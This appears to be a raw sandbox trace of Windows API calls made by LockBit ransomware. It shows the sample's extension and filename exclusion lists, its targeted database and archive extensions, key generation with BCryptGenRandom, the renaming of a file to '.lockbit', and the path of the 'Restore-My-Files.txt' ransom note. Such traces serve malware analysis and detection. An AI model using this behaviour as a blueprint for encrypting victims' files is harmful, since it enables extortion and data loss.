[0210.244] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.244] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.244] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.244] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.244] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.244] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.244] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.244] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.245] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.245] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.245] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.245] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.246] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.246] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.246] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.246] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115876.GIF") returned 1 [0210.246] lstrcmpiW (lpString1="ntldr", lpString2="J0115876.GIF") returned 1 [0210.246] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115876.GIF") returned 1 [0210.246] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115876.GIF") returned -1 [0210.246] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115876.GIF") returned -1 [0210.246] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115876.GIF") returned 1 [0210.246] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115876.GIF") returned -1 [0210.246] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.246] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF") returned=".GIF" [0210.246] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.246] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.246] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.246] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.246] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.246] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.246] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.246] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.247] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.247] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.248] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.248] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF.lockbit") returned 76 [0210.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\j0115876.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.249] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.249] malloc (_Size=0x40068) returned 0x3ef0008 [0210.249] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=350) returned 1 [0210.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0210.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0210.251] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.252] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.252] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.252] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.253] free (_Block=0x1fa2ed8) [0210.253] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115876.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.253] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.253] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.254] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x66293410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="LINES.DLL", cAlternateFileName="")) returned 1 [0210.254] lstrcmpiW (lpString1=".", lpString2="LINES.DLL") returned -1 [0210.254] lstrcmpiW (lpString1="..", lpString2="LINES.DLL") returned -1 [0210.254] PathFindExtensionW (pszPath="LINES.DLL") returned=".DLL" [0210.254] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.254] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.254] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.254] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.254] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.254] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.254] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.255] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.255] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.255] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.255] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.255] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.256] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.256] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6cba9c0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb6cba9c0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb6cba9c0, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0210.256] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0210.256] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0210.256] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0210.256] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0210.256] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0210.256] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0210.256] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0210.256] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0210.256] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0210.257] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0210.258] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0210.258] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0210.259] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0210.259] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0210.259] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0210.259] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0210.259] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0210.259] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6cba9c0, ftCreationTime.dwHighDateTime=0x1d6047d, ftLastAccessTime.dwLowDateTime=0xb6cba9c0, ftLastAccessTime.dwHighDateTime=0x1d6047d, ftLastWriteTime.dwLowDateTime=0xb6cba9c0, ftLastWriteTime.dwHighDateTime=0x1d6047d, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 0 [0210.259] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0210.259] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.DLL", cAlternateFileName="")) returned 1 [0210.259] lstrcmpiW (lpString1=".", lpString2="OFFICE10.DLL") returned -1 [0210.259] lstrcmpiW (lpString1="..", lpString2="OFFICE10.DLL") returned -1 [0210.259] PathFindExtensionW (pszPath="OFFICE10.DLL") returned=".DLL" [0210.259] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.259] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.259] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.259] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.259] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.260] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.260] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.260] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.260] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.260] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.260] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.260] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.261] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.261] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.261] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.261] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156c5e00, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x156c5e00, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x78450, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MMW", cAlternateFileName="")) returned 1 [0210.261] lstrcmpiW (lpString1=".", lpString2="OFFICE10.MMW") returned -1 [0210.262] lstrcmpiW (lpString1="..", lpString2="OFFICE10.MMW") returned -1 [0210.262] PathFindExtensionW (pszPath="OFFICE10.MMW") returned=".MMW" [0210.262] lstrcmpiW (lpString1=".386", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".cmd", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".exe", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".ani", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".adv", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".theme", lpString2=".MMW") returned 1 [0210.262] lstrcmpiW (lpString1=".msi", lpString2=".MMW") returned 1 [0210.262] lstrcmpiW (lpString1=".msp", lpString2=".MMW") returned 1 [0210.262] lstrcmpiW (lpString1=".com", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".diagpkg", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".nls", lpString2=".MMW") returned 1 [0210.262] lstrcmpiW (lpString1=".diagcab", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".lock", lpString2=".MMW") returned -1 [0210.262] lstrcmpiW (lpString1=".ocx", lpString2=".MMW") returned 1 [0210.262] lstrcmpiW (lpString1=".mpa", lpString2=".MMW") returned 1 [0210.262] lstrcmpiW (lpString1=".cpl", lpString2=".MMW") returned -1 [0210.263] lstrcmpiW (lpString1=".mod", lpString2=".MMW") returned 1 [0210.263] lstrcmpiW (lpString1=".hta", lpString2=".MMW") returned -1 [0210.263] lstrcmpiW (lpString1=".icns", lpString2=".MMW") returned -1 [0210.263] lstrcmpiW (lpString1=".prf", lpString2=".MMW") returned 1 [0210.263] lstrcmpiW (lpString1=".rtp", lpString2=".MMW") returned 1 [0210.273] lstrcmpiW (lpString1=".diagcfg", lpString2=".MMW") returned -1 [0210.273] lstrcmpiW (lpString1=".msstyles", lpString2=".MMW") returned 1 [0210.273] lstrcmpiW (lpString1=".bin", lpString2=".MMW") returned -1 [0210.273] lstrcmpiW (lpString1=".hlp", lpString2=".MMW") returned -1 [0210.273] lstrcmpiW (lpString1=".shs", lpString2=".MMW") returned 1 [0210.273] lstrcmpiW (lpString1=".drv", lpString2=".MMW") returned -1 [0210.273] lstrcmpiW (lpString1=".wpx", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".bat", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".rom", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".msc", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".spl", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".ps1", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".msu", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".ics", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".key", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".mp3", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".reg", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".dll", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".ini", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".idx", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".sys", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".hlp", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".ico", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".lnk", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1=".rdp", lpString2=".MMW") returned 1 [0210.274] lstrcmpiW (lpString1=".lockbit", lpString2=".MMW") returned -1 [0210.274] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="OFFICE10.MMW") returned 1 [0210.274] lstrcmpiW (lpString1="ntldr", lpString2="OFFICE10.MMW") returned -1 [0210.274] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="OFFICE10.MMW") returned -1 [0210.274] lstrcmpiW (lpString1="bootsect.bak", lpString2="OFFICE10.MMW") returned -1 [0210.274] lstrcmpiW (lpString1="autorun.inf", lpString2="OFFICE10.MMW") returned -1 [0210.274] lstrcmpiW (lpString1="thumbs.db", lpString2="OFFICE10.MMW") returned 1 [0210.274] lstrcmpiW (lpString1="iconcache.db", lpString2="OFFICE10.MMW") returned -1 [0210.274] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\") returned="" [0210.275] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned=".MMW" [0210.275] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0210.275] lstrcmpiW (lpString1=".7z", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".ckp", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".dacpac", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".db", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".db-shm", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".db-wal", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".db3", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".dbc", lpString2=".MMW") returned -1 [0210.275] lstrcmpiW (lpString1=".dbs", lpString2=".MMW") returned 